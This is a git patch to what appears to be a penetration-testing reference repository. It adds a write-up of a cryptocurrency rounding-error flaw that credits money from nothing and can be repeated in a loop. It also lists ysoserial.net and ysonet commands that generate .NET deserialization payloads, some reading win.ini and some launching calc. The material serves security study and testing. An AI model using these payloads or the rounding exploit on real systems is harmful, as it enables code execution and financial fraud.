From cd15d8596972e4c85bc03669404f6fa73131b98e Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 3 Aug 2025 16:32:40 +0200
Subject: [PATCH] Rounding Errors

---
 Business Logic Errors/README.md    | 14 ++++++++++++++
 Insecure Deserialization/DotNET.md | 23 ++++++++++++++++-------
 Insecure Randomness/README.md      |  9 +++++----
 3 files changed, 35 insertions(+), 11 deletions(-)

diff --git a/Business Logic Errors/README.md b/Business Logic Errors/README.md
index 64a1989..a3f0a58 100644
--- a/Business Logic Errors/README.md	
+++ b/Business Logic Errors/README.md	
@@ -13,6 +13,7 @@
     * [Refund Feature Exploitation](#refund-feature-exploitation)
     * [Cart/Wishlist Exploitation](#cartwishlist-exploitation)
     * [Thread Comment Testing](#thread-comment-testing)
+    * [Rounding Error](#rounding-error)
 * [References](#references)
 
 ## Methodology
@@ -73,6 +74,19 @@ Common examples of Business Logic Errors.
 * If the system allows comments by verified or privileged users, try to mimic these parameters and see if you can comment as well.
 * Attempt to post comments impersonating other users.
 
+### Rounding Error
+
+The report [hackerone #176461](https://web.archive.org/web/20170303191338/https://hackerone.com/reports/176461) describes a business logic flaw in a cryptocurrency platform (using XBT/Bitcoin), where an attacker exploits a rounding error in the internal transfer system to generate money out of nothing.
+
+The attacker initiate a transfer of 0.000000005 XBT (0.5 satoshi), this is below the system's minimum precision which is 1 satoshi minimum.
+
+* Sender's balance doesn't change. The algorithm might be rounded down to 0 satoshi.
+* Receiver's balance increases by 1 satoshi (0.00000001). The algorithm might be rounding up to 1 satoshi.
+
+The attacker generated 0.00000001 XBT from nothing, since there's no rate limit, OTP, or fraud detection, the attacker can automate this process and repeat it infinitely, effectively printing money.
+
+In this example, instead of rounding and rejecting or enforcing a minimum transfer, it ignores the deduction from the sender and credits the receiver.
+
 ## References
 
 * [Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws)
diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md
index 0e47617..201697b 100644
--- a/Insecure Deserialization/DotNET.md	
+++ b/Insecure Deserialization/DotNET.md	
@@ -28,14 +28,23 @@ Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=`
 
 ## Tools
 
-* [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net)
+* [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net) - Deserialization payload generator for a variety of .NET formatters
 
-```ps1
-cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s
-./ysoserial.exe -p DotNetNuke -m read_file -f win.ini
-./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
-./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
-```
+    ```ps1
+    cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s
+    ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini
+    ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
+    ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
+    ```
+
+* [irsdl/ysonet](https://github.com/irsdl/ysonet) - Deserialization payload generator for a variety of .NET formatters
+
+    ```ps1
+    cat my_long_cmd.txt | ysonet.exe -o raw -g WindowsIdentity -f Json.Net -s
+    ./ysonet.exe -p DotNetNuke -m read_file -f win.ini
+    ./ysonet.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
+    ./ysonet.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
+    ```
 
 ## Formatters
 
diff --git a/Insecure Randomness/README.md b/Insecure Randomness/README.md
index 1f9916e..ea74381 100644
--- a/Insecure Randomness/README.md	
+++ b/Insecure Randomness/README.md	
@@ -199,10 +199,11 @@ Generic identification and sandwich attack:
 
 ## References
 
-* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
+* [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - January 6, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction)
+* [Cracking Time-Based Tokens: A Glimpse from a Workshop During leHACK 2025-Singularity - 4m1d0n - June 30, 2025](https://4m1d0n.github.io/retex-insecure-time-token-sandwich-attack/)
+* [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - October 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01)
 * [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)
+* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)
+* [Multi-sandwich attack with MongoDB Object ID or the scenario for real-time monitoring of web application invitations: a new use case for the sandwich attack - Tom CHAMBARETAUD (@AethliosIK) - July 18, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/multi-sandwich-article-en.html)
 * [Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html) *(FR)*
 * [Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html) *(EN)*
-* [Multi-sandwich attack with MongoDB Object ID or the scenario for real-time monitoring of web application invitations: a new use case for the sandwich attack - Tom CHAMBARETAUD (@AethliosIK) - July 18, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/multi-sandwich-article-en.html)
-* [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - October 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01)
-* [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - January 6, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction)